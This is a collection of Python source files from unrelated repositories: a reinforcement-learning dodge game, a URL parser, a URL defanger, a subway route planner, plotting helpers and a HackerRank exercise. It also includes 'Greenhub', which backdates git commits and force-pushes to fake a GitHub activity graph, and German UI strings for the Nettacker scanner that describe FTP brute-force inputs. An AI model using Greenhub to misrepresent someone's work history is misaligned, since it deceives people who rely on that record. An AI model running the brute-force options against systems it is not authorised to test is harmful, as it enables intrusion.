self._game_history = GameHistory(shape=self._game.state_shape())
# self.observation_space = spaces.Box(low=0, high=self._game.max_state_value(), dtype=np.uint8, shape=(self.STATE_HISTORY_SIZE,) + self._game.state_shape()) # TODO: remove if not used
def step(self, action):
reward_enum = self._game.send_key(action)
self._game_history.put(self._game.get_state())
reward = reward_enum.value
observation = self._game_history.get()
done = reward_enum != GameResult.none
info = {"action": action}
return observation, reward, done, info
def reset(self):
self._game.reset()
self._game_history.reset()
self._game_history.put(self._game.get_state())
observation = self._game_history.get()
return observation
def render(self):
self._game.render()
def get_shape_with_history(self):
return self._game_history.shape_with_history
```
#### File: keras-rl/game_th/PlayerHuman.py
```python
from helpers.helper_keyboard import getch
class PlayerHuman():
def __init__(self,game):
self.game = game
def get_input(self,game_state):
pressed_key = getch()
if pressed_key == "q":
self.game.stop() # stty sane
exit()
action_id = self.game.action_id_for_action(pressed_key)
return action_id
```
#### File: simple_Q_learn/game/HumanPlayer.py
```python
import sys
sys.path.append('..')
from helpers.helper_keyboard import getch
class HumanPlayer():
def get_input(self):
return getch()
```
#### File: simple_Q_learn/game_th/Game.py
```python
import numpy as np
import sys
import curses
import traceback
import copy
from collections import namedtuple
from helpers.utils import *
from GameClasses import *
RENDER = True  # not is_train_mode()
FIELD_SIZE = Size(40,20) # w,h
START_PLAYER_POSITION = Point(FIELD_SIZE.w // 2, 0)  # x,y; integer division so the position can index the numpy grid
WIN_TIME = int(FIELD_SIZE.h * 3)
#game objects
sym_player = "P"
sym_bullet = "*"
sym_bonus = "+"
sym_empty = " "
#keys
left_key = "a"
right_key = "d"
up_key = "w"
down_key = "s"
none_key = "*"
actions = [left_key,right_key,up_key,down_key,none_key]
vocab = {
sym_empty:0,
sym_player:1,
sym_bullet:2,
sym_bonus:3,
}
vocab_rev = {v: k for k, v in vocab.items()}
# generating vocabs ids
class Game():
__myscreen = curses.initscr() if RENDER else None
def __update_game_state(self):
self.__game_state = np.zeros(FIELD_SIZE.shape()) # empty
self.__game_state[self.__player_position.x][self.__player_position.y] = vocab[sym_player]
self.__animation_time += 1
# emit bullets
for emitter in self.__emitters:
bullet = emitter.emit(self.__animation_time,self.__bullets)
# move or delete bullets
bullet_for_deleting = []
for bullet in self.__bullets:
bullet.move(self.__animation_time)
if bullet.origin.x >= 0 and bullet.origin.x < FIELD_SIZE.w and bullet.origin.y >= 0 and bullet.origin.y < FIELD_SIZE.h:
self.__game_state[bullet.origin.x][bullet.origin.y] = vocab[sym_bullet]
else:
bullet_for_deleting.append(bullet)
self.__bullets = [x for x in self.__bullets if x not in bullet_for_deleting]
def __del__(self):
self.stop()
# public
def print_controls(self):
if RENDER:
self.__myscreen.addstr("q - quit, left_key - {}, right_key - {}, up_key - {}, down_key - {}".format(left_key,right_key,up_key,down_key))
def reset(self):
origin = Point(FIELD_SIZE.w/2, FIELD_SIZE.h * 0.8)
self.__animation_time = 0
self.__emitters = [
CircleWithHoleBulletEmitter(origin, PI * -0.5, PI * 1.2, 0.5, 12)
# VarAngleBulletEmitter(origin, PI * 0., PI * 1.2, 30, True, 1, 1),
# VarAngleBulletEmitter(origin, PI * 2., PI * 0.8, 30, False, 1, 1),
# CircleBulletEmitter(origin, 10, 1, 6),
]
self.__bullets = []
self.__player_position = copy.copy(START_PLAYER_POSITION)
self.__update_game_state()
def render(self):
if RENDER:
y_offset = 2
self.__myscreen.addstr(y_offset - 1,0,"animation_time: " + str(self.__animation_time) + " WIN_TIME: " + str(WIN_TIME) + " ")
for x in range(FIELD_SIZE.w):
for y in range(FIELD_SIZE.h):
sym = vocab_rev[int(self.__game_state[x][y])]
y_rev = FIELD_SIZE.h - 1 - y
self.__myscreen.addstr(y_rev + y_offset,x,sym)
self.__myscreen.addstr("\n")
self.__myscreen.refresh()
def send_key(self,pressed_key):
if pressed_key == "q":
if RENDER:
curses.endwin() # stty sane
exit()
if pressed_key == up_key:
self.__player_position.y += 1
if pressed_key == down_key:
self.__player_position.y -= 1
if pressed_key == left_key:
self.__player_position.x -= 1
if pressed_key == right_key:
self.__player_position.x += 1
self.__player_position.x = clamp(self.__player_position.x,0,FIELD_SIZE.w - 1)
self.__player_position.y = clamp(self.__player_position.y,0,FIELD_SIZE.h - 1)
self.__update_game_state()
for bullet in self.__bullets:
if self.__player_position == bullet.origin:
self.reset()
return GameResult.los
if self.__animation_time % WIN_TIME == 0:
return GameResult.win
return GameResult.none
# aiplayer requirements
def get_actions(self):
return actions
def get_num_actions(self):
return len(actions)
def state_shape(self):
NUM_OF_IMAGE_CHANNELS = 1
return (NUM_OF_IMAGE_CHANNELS,) + FIELD_SIZE.shape()
def get_state(self):
return state_with_channels(self.__game_state)
def get_train_data(self,action_id):
animation_time = self.__animation_time
emitters = copy.deepcopy(self.__emitters)
bullets = copy.deepcopy(self.__bullets)
player_position = copy.copy(self.__player_position)
old_state = np.copy(self.__game_state)
reward = self.send_key(actions[action_id])
new_state = np.copy(self.__game_state)
game_over = reward != GameResult.none
self.__animation_time = animation_time
self.__emitters = emitters
self.__bullets = bullets
self.__player_position = player_position
self.__game_state = np.copy(old_state)
return state_with_channels(old_state), action_id, reward, state_with_channels(new_state), game_over
def stop(self):
if RENDER:
curses.endwin()
def state_with_channels(data):
return np.expand_dims(data, axis=0)
```
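A hedged sketch of a driver loop for the `Env` wrapper above, using a random policy; the flat `Game` and `Env` import paths are assumptions about how the scripts sit on `sys.path`:
```python
# Hypothetical random-agent loop; import paths are assumptions.
import random

from Game import Game
from Env import Env

env = Env(Game())
observation = env.reset()
done = False
while not done:
    action = random.randrange(env.action_space.n)   # uniform random action
    observation, reward, done, info = env.step(action)
    env.render()
```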
{
"source": "0x3a/hostparse",
"score": 3
} |
#### File: hostparse/hostparse/hostparse.py
```python
import os
import sys
import difflib
import argparse
from itertools import tee
# py3 "compatible"
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
import tldextract
"""
The tool is very simple and just maps -known- arguments through an objector dict.
It might not be pretty but its surprisingly efficient.
"""
# Taken from: https://mail.python.org/pipermail/tutor/2003-November/026645.html
class Unbuffered(object):
def __init__(self, stream):
self.stream = stream
def write(self, data):
self.stream.write(data)
self.stream.flush()
def writelines(self, datas):
self.stream.writelines(datas)
self.stream.flush()
def __getattr__(self, attr):
return getattr(self.stream, attr)
# Remove buffering, processing large datasets eats memory otherwise
sys.stdout = Unbuffered(sys.stdout)
# Taken from https://goodcode.io/articles/python-dict-object/
class ObjDict(dict):
def from_dict(self, d):
for key, value in d.items():
self[key] = value
return self
def __getattr__(self, name):
if name in self:
return self[name]
else:
raise AttributeError("No such attribute: " + name)
def __setattr__(self, name, value):
self[name] = value
def __delattr__(self, name):
if name in self:
del self[name]
else:
raise AttributeError("No such attribute: " + name)
def parse_url(url):
o = ObjDict()
p_url = urlparse.urlparse(url)
t_url = tldextract.extract(url)
o.filename = p_url.path.split("/")[-1]
o.scheme = p_url.scheme
o.username = p_url.username
o.password = p_url.password
o.subdomain = t_url.subdomain
o.domain = t_url.domain
o.tld = t_url.suffix
o.hostname = p_url.hostname
o.suffix = t_url.suffix
o.port = p_url.port
o.path = p_url.path
o.params = p_url.params
o.query = p_url.query
o.fragment = p_url.fragment
return o
KEYWORDS = [
'username',
'domain',
'fragment',
'query',
'path',
'password',
'port',
'subdomain',
'hostname',
'filename',
'params',
'tld',
'scheme'
]
def process_args():
parser = argparse.ArgumentParser(prog='hostparse')
parser.add_argument('-d', '--delimiter', dest='delim', default='.', help="Output delimiter.")
    parser.add_argument('format', nargs=None,
                        help="Format keywords separated by a comma. Keywords: scheme, username, password, subdomain, \
                        domain, hostname, tld, port, path, filename, params, query, fragment. A keyword may be \
                        abbreviated to any unambiguous prefix (ho is hostname, t is tld, po is port; p alone is ambiguous).")
args = parser.parse_args()
format_str = []
for format_keyword in args.format.split(','):
km = [item for item in KEYWORDS if item.startswith(format_keyword)]
if len(km) > 1:
parser.error("Supplied format key '{k}' isn't specific enough, matches multiple keywords ({m}).".format(k=format_keyword, m=','.join(km)))
if len(km) < 1:
parser.error("Supplied format key '{k}' doesn't match any keyword.".format(k=format_keyword))
format_str.append(km[0])
return format_str, args.delim
def main():
format_str, delim = process_args()
for line in sys.stdin:
line = line.rstrip()
        print(delim.join(str(getattr(parse_url(line), fk)) for fk in format_str))  # str(): port is an int, other fields may be None
```
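Besides the stdin-driven CLI, `parse_url` can be called directly; a small sketch, assuming the installed package layout:
```python
# Hypothetical direct use of the parser; the CLI normally reads URLs from stdin.
from hostparse.hostparse import parse_url

o = parse_url("https://user:[email protected]:8443/path/to/file.html?q=1#frag")
print(o.subdomain)   # sub
print(o.domain)      # example
print(o.tld)         # co.uk
print(o.port)        # 8443
print(o.filename)    # file.html
```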
{
"source": "0x3a/pydefang",
"score": 3
} |
#### File: pydefang/defang/lib.py
```python
import re
mappings = [
('.', '[.]'),
(':', '[:]'),
('http', 'hxxp'),
('ftp', 'fxp'),
]
def defang(url):
for k, v in mappings:
url = re.sub(re.escape(k), v, url, flags=re.I)
return url
def refang(url):
for k, v in mappings:
url = re.sub(re.escape(v), k, url, flags=re.I)
return url
```
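A round-trip sketch of the two helpers above; note the substitutions apply in mapping order, so `http` is rewritten only after `:` has become `[:]`:
```python
# defang/refang round trip; the package import path follows the file header above.
from defang.lib import defang, refang

url = "http://malicious.example.com"
safe = defang(url)
print(safe)                  # hxxp[:]//malicious[.]example[.]com
assert refang(safe) == url   # refang restores the original URL
```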
{
"source": "0x3fc/greenhub",
"score": 3
} |
#### File: greenhub/Greenhub/Greenhub.py
```python
from os import path
from subprocess import call
import random
from Greenhub.Date import Date
from Greenhub.Graph import Graph
class Greenhub:
file_name = 'green.hub'
def __init__(self):
"""
create commit file if not exists
"""
if not path.isfile(self.file_name):
open(self.file_name, 'w')
@staticmethod
def commit_graph(name=None, base_commit_times=0):
"""
commit according to a given graph
Args:
name (str): the file name of the graph
base_commit_times (int): for all non zero commit, add this number of commit times
"""
# get the first date of Github contribution graph
first_date = Greenhub.get_first_date()
# get the processed graph
graph = Graph.process(first_date, name)
# commit graph
for date, commit_times in graph.items():
# repeat commit times
for commit in range(commit_times + base_commit_times):
# commit on the date
Greenhub.commit(date)
@staticmethod
def commit_everyday(start_date=None, commit_count_range=None):
"""
commit everyday from a start date so the time line in github shows green
Args:
start_date (str) : the start date
commit_count_range (list): the range of the commit times (e.g. [1, 5]: will commit randomly once to five
times)
"""
# set start date to the Github contribution first date if start date is not specified
if start_date is None:
start_date = Greenhub.get_first_date()
else:
start_date = Date(start_date)
# commit everyday until now
Greenhub.commit_in_range(start_date, Date().tomorrow(), commit_count_range)
@staticmethod
def filter_commit_date():
"""
change the commit date to author date
"""
# git filter-branch --env-filter 'export GIT_COMMITTER_DATE="$GIT_AUTHOR_DATE"'
call(['git', 'filter-branch', '--env-filter', """export GIT_COMMITTER_DATE="$GIT_AUTHOR_DATE" """])
@staticmethod
def push(force=False):
"""
push changes to github
Args:
force (bool): when true, do a force push
"""
push_commit = ['git', 'push']
if force:
push_commit.append('--force')
call(push_commit)
@staticmethod
def commit_in_range(start_date, end_date, commit_count_range=None):
"""
commit from start date til end date (include start date, exclude end date)
Args:
start_date (Date): the start date (inclusive: will have commit on this date)
end_date (Date): the end date (exclusive: will not have commit on this date)
commit_count_range (list): the range of the commit times (e.g. [1, 5]: will commit randomly once to five
times)
"""
# check if start date is larger than end date
if start_date > end_date:
return
if commit_count_range is None:
commit_count_range = [1, 1]
# commit start date and move to next date until reaches end date
while start_date != end_date:
for commit_times in range(0, random.randint(commit_count_range[0], commit_count_range[1])):
Greenhub.commit(str(start_date))
start_date.tomorrow()
@staticmethod
def commit(date):
"""
commit a file and change the date to the given date
Args:
date (str): the commit date with date format
"""
# update file
Greenhub.write(date)
# git add {file_name}
call(['git', 'add', Greenhub.file_name])
# git commit -m "{date}" --date="{date}"
call(['git', 'commit', '-m', "%s" % date, '--date="%s"' % date])
@staticmethod
def write(date):
"""
write green hub file a date and a random number
Args:
date (str): the date that will appear in the file
"""
# set file content to a date time with a random number
content = '%s: %f' % (date, random.random())
# update file with the content
with open(Greenhub.file_name, 'w') as file:
file.write(content)
@staticmethod
def get_first_date():
"""
calculate the first date of the Github page contribution
Returns:
Date: the first date shown in the Github page contribution
"""
# get today date
date = Date()
# get today weekday
weekday = date.get_weekday()
# move date to 53 weeks before
date.weeks_before(53)
# if is not sunday, move date to sunday
if weekday != 7:
date.days_before(weekday)
return date
```
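A hedged sketch of a typical driver for the class above; it assumes the working directory is a git repository whose history you are willing to rewrite:
```python
# Hypothetical driver; rewriting and force-pushing history is destructive.
from Greenhub.Greenhub import Greenhub

hub = Greenhub()                                     # creates green.hub if missing
Greenhub.commit_everyday(commit_count_range=[1, 3])  # 1-3 commits per day
Greenhub.filter_commit_date()                        # align committer date with author date
Greenhub.push(force=True)
```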
{
"source": "0x404/sig_proc",
"score": 2
} |
#### File: 0x404/sig_proc/waveplothelper.py
```python
from mysignalslib import Wave
from matplotlib import pyplot
from math import pi, floor, ceil
def inf_iter(obj):
while True:
for x in obj:
yield x
def set_x_ticks(plot, min_x, max_x, density=None):
# now it works only for min_x == 0
density_vals = ('very tight', 'tight', 'normal', 'loose', None)
if density not in density_vals:
raise ValueError('Possible values for density: ' + ', '.join(density_vals) + ' (auto)')
if density is None:
diff = (max_x - min_x) / pi
if diff <= 2:
density = 'very tight'
elif diff <= 5:
density = 'tight'
elif diff <= 10:
density = 'normal'
else:
density = 'loose'
x_ticks = [0]
x_labels = ['']
max_x_pis = max_x / pi
max_x_full_pis = ceil(max_x_pis)
too_much = max_x_full_pis - max_x_pis
if density == 'very tight':
for i in range(max_x_full_pis):
x_ticks += [
(i + 1/8) * pi,
(i + 1/4) * pi,
(i + 3/8) * pi,
(i + 1/2) * pi,
(i + 5/8) * pi,
(i + 3/4) * pi,
(i + 7/8) * pi,
(i + 1) * pi]
x_labels += [
'$\\frac{%i}{8}\\pi$' % (i*8 + 1),
'$\\frac{%i}{4}\\pi$' % (i*4 + 1),
'$\\frac{%i}{8}\\pi$' % (i*8 + 3),
'$\\frac{%i}{2}\\pi$' % (i*2 + 1),
'$\\frac{%i}{8}\\pi$' % (i*8 + 5),
'$\\frac{%i}{4}\\pi$' % (i*4 + 3),
'$\\frac{%i}{8}\\pi$' % (i*8 + 7),
'$%i\\pi$' % (i + 1)
]
for x in range(1, 9):
if too_much < x / 8:
break
x_ticks.pop()
x_labels.pop()
elif density == 'tight':
for i in range(max_x_full_pis):
x_ticks += [
(i + 1/4) * pi,
(i + 1/2) * pi,
(i + 3/4) * pi,
(i + 1) * pi]
x_labels += [
'$\\frac{%i}{4}\\pi$' % (i*4 + 1),
'$\\frac{%i}{2}\\pi$' % (i*2 + 1),
'$\\frac{%i}{4}\\pi$' % (i*4 + 3),
'$%i\\pi$' % (i + 1)
]
elif density == 'normal':
for i in range(max_x_full_pis):
x_ticks += [
(i + 1/2) * pi,
(i + 1) * pi]
x_labels += [
'$\\frac{%i}{2}\\pi$' % (i*2 + 1),
'$%i\\pi$' % (i + 1)
]
else:
for i in range(max_x_full_pis):
x_ticks += [
(i + 1) * pi]
x_labels += [
'$%i\\pi$' % (i + 1)
]
plot.set_xticks(x_ticks)
plot.set_xticklabels(x_labels)
def multiplot(*subplots, others=None, x_range=None):
    others = others or []  # avoid the mutable-default-argument pitfall
    num_rows = len(subplots) + len(others)
grid_size = (num_rows, 1)
x_range = x_range or Wave.x_range(*sum(subplots, []))
y_range = Wave.y_range(*sum(subplots, []), spacing=(1, 1))
colors = inf_iter(['turquoise', 'hotpink', 'dodgerblue', 'slateblue', 'darkorchid'])
for index, subplot in enumerate(subplots):
plot = pyplot.subplot2grid(grid_size, (index, 0))
pyplot.grid(True)
for wave in subplot:
wave.plot(next(colors))
pyplot.ylim(y_range)
pyplot.xlim(x_range)
set_x_ticks(plot, *x_range)
pyplot.locator_params(axis='y', nbins=20)
pyplot.tick_params(axis='y', labelsize=9)
pyplot.tick_params(axis='x', labelsize=13)
pyplot.legend(ncol=3, loc='upper center', bbox_to_anchor=(0.5, 1.15))
for index, other in enumerate(others):
plot = pyplot.subplot2grid(grid_size, (len(subplots) + index, 0))
pyplot.grid(True)
other.plot(next(colors))
pyplot.ylim([min(other.values), max(other.values)])
pyplot.xlim([0, len(other.values)])
pyplot.tick_params(axis='y', labelsize=9)
pyplot.tick_params(axis='x', labelsize=9)
pyplot.legend(ncol=3, loc='upper center', bbox_to_anchor=(0.5, 1.15))
pyplot.tight_layout()
pyplot.subplots_adjust(top=0.9, hspace=0.3)
```
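The pi-based tick labelling can be exercised without the `Wave` class; a minimal sketch, assuming this module is importable as `waveplothelper` and with made-up plot data:
```python
# Minimal sketch of set_x_ticks on a bare matplotlib axes.
from math import pi

from matplotlib import pyplot

from waveplothelper import set_x_ticks

_, axes = pyplot.subplots()
xs = [i * 2 * pi / 200 for i in range(201)]
axes.plot(xs, [0.5] * len(xs))
set_x_ticks(axes, 0, 2 * pi, density='normal')   # half-pi ticks: pi/2, pi, 3/2 pi, 2 pi
pyplot.show()
```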
{
"source": "0x404/subway",
"score": 4
} |
#### File: subway/core/model.py
```python
from core import solution
class Station:
"""
station class
"""
def __init__(self, st_name, is_trans=False):
self._name = st_name
self._trans = is_trans
@property
def name(self):
"""get station's name"""
return self._name
@property
def is_trans(self):
"""whther a station is a transfer station"""
return self._trans
def __str__(self):
if self._trans:
return "station(%s, transfer_st)" % (self._name)
return "station(%s, normal_st)" % (self._name)
class Edge:
"""
line edge
"""
def __init__(self, station_to, belong_to):
self._station_to = station_to
self._belong_to = belong_to
@property
def station_to(self):
"""which station an edge link to"""
return self._station_to
@property
def belong_to(self):
"""which line an edge belong to"""
return self._belong_to
class Line:
"""
line class, consists of stations
"""
def __init__(self, line_name, st_list, is_ring=False):
self._name = line_name
self._st_list = st_list
self._ring = is_ring
@property
def name(self):
"""a line's name"""
return self._name
@property
def is_ring(self):
"""whether the line is a ring"""
return self._ring
@property
def station_list(self):
"""get station list of a line"""
return self._st_list
@property
def start(self):
"""name of the first station"""
assert len(self._st_list) > 0
return self._st_list[0].name
@property
def end(self):
"""name of the last station"""
assert len(self._st_list) > 0
return self._st_list[-1].name
@property
def length(self):
"""length of line"""
return len(self._st_list)
def __str__(self):
return "地铁线: " + self._name
class SubwaySys:
"""
subwaySys class, consists of lines
"""
def __init__(self, line_list=None):
self.str2st = {} # station_name -> station
self.nexto = {} # station_name -> edge
self.lines = []
if line_list is not None:
for line in line_list:
self.add_line(line)
def add_line(self, line):
"""Add a line to subway system.
Args:
line: line object to be added.
"""
self.lines.append(line)
for i in range(len(line.station_list) - 1):
self._link(line.station_list[i], line.station_list[i + 1], line.name)
if line.is_ring and len(line.station_list) > 1:
self._link(line.station_list[0], line.station_list[-1], line.name)
def _link(self, st_i, st_j, edge_belong, directed=False):
"""Link station i and station j in subway system.
Args:
st_i: station object.
st_j: station object.
edge_belong: str, line name of Edge(station i, station j).
directed: bool, indicates whether it is directed.
Return:
None.
"""
if st_i.name not in self.str2st:
self.str2st[st_i.name] = Station(st_i.name, st_i.is_trans)
if st_j.name not in self.str2st:
self.str2st[st_j.name] = Station(st_j.name, st_j.is_trans)
st_i = st_i.name
st_j = st_j.name
if st_i not in self.nexto:
self.nexto[st_i] = []
if st_j not in self.nexto:
self.nexto[st_j] = []
if not solution.is_nexto(st_j, st_i, self.nexto):
self.nexto[st_i].append(Edge(st_j, edge_belong))
if not directed and not solution.is_nexto(st_i, st_j, self.nexto):
self.nexto[st_j].append(Edge(st_i, edge_belong))
def shortest_path(self, start, end):
"""Calculate shortest path form start to end.
Args:
start: str or station obejct, indicates start station
end: str or station object, indicates end station
Return:
a decorated shortest path,
e.g.[[start, msg], [station, msg1], ..., [end, msg]]
"""
if isinstance(start, str):
assert start in self.str2st, "station {} is not in subway system.".format(
start
)
else:
start = start.name
if isinstance(end, str):
assert end in self.str2st, "station {} is not in subway system.".format(end)
else:
end = end.name
ans_path = solution.shortest_path(start, end, self.nexto)
ans_path = list(map(lambda x: self.str2st[x], ans_path))
return solution.docorate_path(ans_path, self.nexto)
def travel_path_from(self, start):
"""Calculate the travel path.
Calculate the path that travels all station.
Args:
start: str or station object, indicats the start station.
Return:
A list of station name indicates the path.
"""
if isinstance(start, str):
assert start in self.str2st, "station {} is not in subway system".format(
start
)
else:
start = start.name
return solution.travel_path_from(start, self.nexto, self.lines)
def walk_side(self, path):
"""Test by test file.
Args:
path: list of strs, indicates station name.
Return:
{"stats" : ("true", "false", "error"), "miss_st" : None}.
"true": If the stations in the list do cover all stations of the whole subway
at least once, and the number of stations is correct,
the traversal order of stations is reasonable.
"false": The traversal order of stations is still reasonable,
but there are missing stations or the number of stations is wrong.
If there are missing stations, this program should output
at least one missing station name.
"error": If the traversal order of the station is unreasonable.
"""
return solution.verify_path(path, self.nexto)
```
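A small end-to-end sketch of the model classes above; the `solution` helpers they delegate to are not shown here, so treat this as illustrative:
```python
# Hypothetical usage of the model classes; station names are made up.
from core.model import Station, Line, SubwaySys

line1 = Line("Line 1", [Station("A"), Station("B", is_trans=True), Station("C")])
line2 = Line("Line 2", [Station("B", is_trans=True), Station("D")])
subway = SubwaySys([line1, line2])

print(subway.shortest_path("A", "D"))   # decorated path A -> B (transfer) -> D
```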
#### File: subway/core/utils.py
```python
from core.model import Station
from core.model import Line
def load_lines(data_path):
"""Load subway lines from data file.
Args:
        data_path: the path of subway data, specifically `data/beijing-subway.txt`
Return:
list: a list of Line object, e.g. [Line1, Line2, ...]
"""
line_name = ""
station_list, lines = [], []
is_ring = False
file = open(data_path, mode="r", encoding="utf-8")
while True:
strs = file.readline()
if not strs and len(station_list) > 0:
if line_name:
lines.append(
Line(line_name=line_name, st_list=station_list, is_ring=is_ring)
)
break
strs = strs.strip("\n").strip()
strs = strs.split(" ")
if strs[0] == "L":
if len(station_list) > 0:
lines.append(
Line(line_name=line_name, st_list=station_list, is_ring=is_ring)
)
line_name = strs[1]
station_list = []
            is_ring = strs[2] == "1"
else:
            station_list.append(Station(strs[0], strs[1] == "1"))
file.close()
return lines
def load_station_pos(data_path):
"""Load station position.
Args:
data_path: the path of station position file.
Return:
a dict, which key is station name, and value is (x, y) position,
#NOTE: position here are the percentage relative to the upper left corner.
"""
station_pos = dict()
with open(data_path, encoding="utf-8") as file:
for _, line in enumerate(file):
line = line.strip("\n").strip()
line = split_by_space(line)
if len(line) != 3:
print(line)
station_name = line[0]
position_x = float(line[1]) / 3000
position_y = float(line[2]) / 1978
station_pos[station_name] = [position_x, position_y]
return station_pos
def load_test_file(data_path):
"""Load test file.
Args:
data_path: the path of test data
Return:
list: list of station name, e.g. ["海淀黄庄", "知春路", "知春里", ...]
"""
lines = []
with open(data_path, encoding="utf-8") as file:
for _, line in enumerate(file):
line = line.strip("\n").strip()
line = split_by_space(line)
lines += line
return lines
def split_by_space(inputs):
"""Split str by space.
Args:
inputs: str, e.g. "x y z ww e "
Return:
list of strs, e.g. ["x", "y", "z", "ww", "e"]
"""
ans = []
now_str = ""
length = len(inputs)
for index in range(length):
if inputs[index] == " ":
if len(now_str) > 0:
ans.append(now_str)
now_str = ""
else:
now_str = now_str + inputs[index]
if len(now_str) > 0:
ans.append(now_str)
return ans
```
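And a loading sketch for the utilities above, using the data path the build script produces:
```python
# Hypothetical loading sketch; the data file is generated by scripts/build.py.
from core.utils import load_lines

lines = load_lines("data/beijing-subway.txt")
for line in lines:
    print(line.name, line.length, "ring" if line.is_ring else "linear")
```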
#### File: subway/scripts/build.py
```python
import sys
# pylint: disable=too-many-branches, consider-using-enumerate
def generate_data(data_path, target_path):
"""
    :param data_path: path of the source data file
    :param target_path: path of the generated data file
    Source data file format:
        #line_name_1 (# marks the start of a subway line)
        station_1 station_2 ... station_n
        #$line_name_2 ($ marks this line as a ring)
        station_1 station_2 ... station_n
        ...
        # (the file must end with #)
    Generated data file format:
        L line_name_1 1/0 # L marks a subway line, 1/0 tells whether the line is a ring
        station_1 1/0 # 1/0 tells whether the station is a transfer station
        station_2 1/0
        ...
        station_n 1/0
        L line_name_2 1/0
        station_1 1/0
        station_2 1/0
        ...
        station_n 1/0
        ...
"""
ring = False
line_name = ""
data, st_list = [], []
file = open(data_path, mode="r", encoding="utf-8")
for line in file:
line = line.strip()
if len(line) == 0:
continue
line = line.split(" ")
for station in line:
if station[0] == "#":
if len(st_list) > 0:
data.append(
{"line": line_name, "ring": ring, "station_list": st_list}
)
ring = False
line_name = ""
st_list = []
station = station[1:]
if len(station) > 0 and station[0] == "$":
ring = True
station = station[1:]
line_name = station
else:
st_list.append({"station_name": station, "transfer": False})
file.close()
for i in range(len(data)):
for j in range(i + 1, len(data)):
for st_i in data[i]["station_list"]:
for st_j in data[j]["station_list"]:
if st_i["station_name"] == st_j["station_name"]:
st_i["transfer"] = st_j["transfer"] = True
file = open(target_path, mode="w", encoding="utf-8")
for line in data:
file.write("L " + line["line"] + " " + ("1" if line["ring"] else "0") + "\n")
for station in line["station_list"]:
file.write(
station["station_name"]
+ " "
+ ("1" if station["transfer"] else "0")
+ "\n"
)
file.close()
if __name__ == "__main__":
if len(sys.argv) != 3:
print("parameter error!")
print("python build.py source_path target_path")
print(
"example : python build.py data/beijing-subway-raw.txt data/beijing-subway.txt"
)
else:
generate_data(sys.argv[1], sys.argv[2])
print("finished!")
```
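A round-trip sketch of the converter above on a tiny synthetic file; the module import path, file paths, and line names are all made up:
```python
# Hypothetical round trip; assumes scripts/build.py is importable as a module.
from scripts.build import generate_data

raw = "#LineA\nA B C\n#$RingB\nB D E\n#"
with open("/tmp/raw.txt", "w", encoding="utf-8") as f:
    f.write(raw)

generate_data("/tmp/raw.txt", "/tmp/built.txt")
print(open("/tmp/built.txt", encoding="utf-8").read())
# B appears on both lines, so it is written with the transfer flag set to 1.
```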
{
"source": "0x41haz/HackerRank",
"score": 4
} |
#### File: HackerRank/python3/writefunc.py
```python
def is_leap(year):
    if (year % 4) != 0:
        return False
    elif (year % 100) != 0:
        return True
    elif (year % 400) == 0:
        return True
    else:
        return False
year = int(input())
print(is_leap(year))
```
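A few quick checks of the rule, assuming `is_leap` from above is in scope (the script itself reads a year from stdin):
```python
# Sanity checks for the Gregorian leap-year rule.
assert is_leap(2016) is True    # divisible by 4 only
assert is_leap(1900) is False   # divisible by 100 but not by 400
assert is_leap(2000) is True    # divisible by 400
assert is_leap(2015) is False   # not divisible by 4
```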
{
"source": "0x43f/OWASP-Nettacker",
"score": 2
} |
#### File: lib/language/messages_de.py
```python
def all_messages():
"""
keep all messages in de
Returns:
all messages in JSON
"""
return \
{
"scan_started": "Nettacker Motor gestartet ...",
"options": "python nettacker.py [Optionen]",
"help_menu": "Zeige Nettacker Hilfe-Menü",
"license": "Bitte lesen Sie die Lizenz und die Vereinbarungen https://github.com/viraintel/OWASP-Nettacker",
"engine": "Motor",
"engine_input": "Motoreingangsoptionen",
"select_language": "wähle eine Sprache {0}",
"range": "scanne alle IPs im Bereich",
"subdomains": "Subdomains finden und scannen",
"thread_number_connections": "Thread-Nummern für Verbindungen zu einem Host",
"thread_number_hosts": "Thread-Nummern für Scan-Hosts",
"save_logs": "Speichern Sie alle Logs in der Datei (results.txt, results.html, results.json)",
"target": "Ziel",
"target_input": "Zieleingabeoptionen",
"target_list": "Ziel (e) Liste, getrennt mit \",\"",
"read_target": "Lese Ziel (e) aus Datei",
"scan_method_options": "Scan-Methodenoptionen",
"choose_scan_method": "Suchmethode {0} auswählen",
"exclude_scan_method": "Suchmethode auswählen, um {0} auszuschließen",
"username_list": "Benutzername (s) Liste, getrennt mit \",\"",
"username_from_file": "Lese den Benutzernamen aus der Datei",
"password_seperator": "Passwort (s) Liste, getrennt mit \",\"",
"read_passwords": "Lies das Passwort aus der Datei",
"port_seperator": "Port (s) Liste, getrennt mit \",\"",
"time_to_sleep": "Zeit zwischen jeder Anfrage zu schlafen",
"error_target": "Das Ziel (die Ziele) kann nicht angegeben werden",
"error_target_file": "Die Ziele können nicht angegeben werden, Datei kann nicht geöffnet werden: {0}",
"thread_number_warning": "Es ist besser, die Thread-Nummer niedriger als 100 zu verwenden, "
"BTW wir fahren fort ...",
"set_timeout": "Setzen Sie Timeout auf {0} Sekunden, es ist zu groß, oder? Übrigens machen wir weiter ...",
"scan_module_not_found": "Dieses Scanmodul [{0}] wurde nicht gefunden!",
"error_exclude_all": "Sie können nicht alle Scanmethoden ausschließen",
"exclude_module_error": "Das Modul {0}, das Sie zum Ausschluss ausgewählt haben, wurde nicht gefunden!",
"method_inputs": "Geben Sie Methodeneingaben ein, zum Beispiel: ftp_brute_users = test, admin & "
"ftp_brute_passwds = read_from_file: /tmp/pass.txt&ftp_brute_port=21",
"error_reading_file": "kann die Datei {0} nicht lesen",
"error_username": "Kann den Benutzernamen nicht angeben, Datei kann nicht geöffnet werden: {0}",
"found": "{0} gefunden! ({1}: {2})",
"error_password_file": "Kann das / die Passwort (e) nicht angeben, Datei kann nicht geöffnet werden: {0}",
"file_write_error": "Datei \"{0}\" ist nicht beschreibbar!",
"scan_method_select": "Bitte wählen Sie Ihre Scan-Methode!",
"remove_temp": "Entfernen von temporären Dateien!",
"sorting_results": "Ergebnisse sortieren!",
"done": "erledigt!",
"start_attack": "fange an, {0}, {1} von {2} anzugreifen",
"module_not_available": "Dieses Modul \"{0}\" ist nicht verfügbar",
"error_platform": "Leider konnte diese Version der Software nur unter Linux / Osx / Windows "
"ausgeführt werden.",
"python_version_error": "Ihre Python-Version wird nicht unterstützt!",
"skip_duplicate_target": "Doppeltes Ziel überspringen (einige Subdomains / Domains können dieselbe "
"IP und dieselben Bereiche haben)",
"unknown_target": "unbekannter Zieltyp [{0}]",
"checking_range": "Überprüfung des Bereichs {0} ...",
"checking": "Überprüfung von {0} ...",
"HOST": "GASTGEBER",
